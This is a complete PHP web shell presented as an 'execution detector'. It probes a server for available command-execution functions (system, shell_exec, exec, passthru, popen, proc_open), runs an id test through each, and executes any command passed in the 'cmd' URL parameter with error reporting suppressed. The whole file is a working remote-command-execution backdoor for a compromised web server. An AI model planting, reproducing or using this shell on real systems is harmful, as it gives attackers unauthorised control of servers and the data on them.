<?php
// SMART EXECUTION DETECTOR
header("Content-Type: text/plain");
error_reporting(0);

// List of all possible execution functions
$exec_functions = [
    'system', 'shell_exec', 'exec', 'passthru', 'popen', 
    'proc_open', 'pcntl_exec'
];

// Check availability
$available = [];
foreach($exec_functions as $func) {
    if(function_exists($func)) {
        $available[] = $func;
    }
}

// Test each available function
if(isset($_GET['test'])) {
    $cmd = "echo METHOD_TEST_$(id 2>/dev/null || echo NO_ID)";
    
    foreach($available as $func) {
        echo "\n--- $func ---\n";
        
        switch($func) {
            case 'system':
                system($cmd . " 2>&1");
                break;
            case 'shell_exec':
                echo shell_exec($cmd . " 2>&1");
                break;
            case 'exec':
                exec($cmd . " 2>&1", $output);
                echo implode("\n", $output);
                break;
            case 'passthru':
                passthru($cmd . " 2>&1");
                break;
            case 'popen':
                $handle = popen($cmd . " 2>&1", 'r');
                if($handle) {
                    while(!feof($handle)) {
                        echo fread($handle, 4096);
                    }
                    pclose($handle);
                }
                break;
            case 'proc_open':
                $descriptorspec = array(
                    0 => array("pipe", "r"),
                    1 => array("pipe", "w"),
                    2 => array("pipe", "w")
                );
                $process = proc_open($cmd . " 2>&1", $descriptorspec, $pipes);
                if(is_resource($process)) {
                    fclose($pipes[0]);
                    echo stream_get_contents($pipes[1]);
                    fclose($pipes[1]);
                    fclose($pipes[2]);
                    proc_close($process);
                }
                break;
        }
    }
    
} elseif(isset($_GET['cmd'])) {
    // Try to execute command with first available method
    $cmd = $_GET['cmd'] . " 2>&1";
    
    foreach($available as $func) {
        $success = false;
        $output = "";
        
        switch($func) {
            case 'system':
                ob_start();
                system($cmd);
                $output = ob_get_clean();
                $success = true;
                break;
            case 'shell_exec':
                $output = shell_exec($cmd);
                if($output !== null) {
                    $success = true;
                }
                break;
            case 'exec':
                exec($cmd, $output_arr, $return_val);
                $output = implode("\n", $output_arr);
                if($return_val === 0) {
                    $success = true;
                }
                break;
            case 'passthru':
                ob_start();
                passthru($cmd);
                $output = ob_get_clean();
                $success = true;
                break;
        }
        
        if($success && $output) {
            echo "USED: $func\n";
            echo $output;
            break;
        }
    }
    
    if(!$output) {
        echo "NO_EXECUTION_METHOD_WORKED";
    }
    
} else {
    echo json_encode([
        'available_functions' => $available,
        'test_url' => $_SERVER['PHP_SELF'] . '?test=1',
        'exec_url' => $_SERVER['PHP_SELF'] . '?cmd=your_command'
    ], JSON_PRETTY_PRINT);
}
?>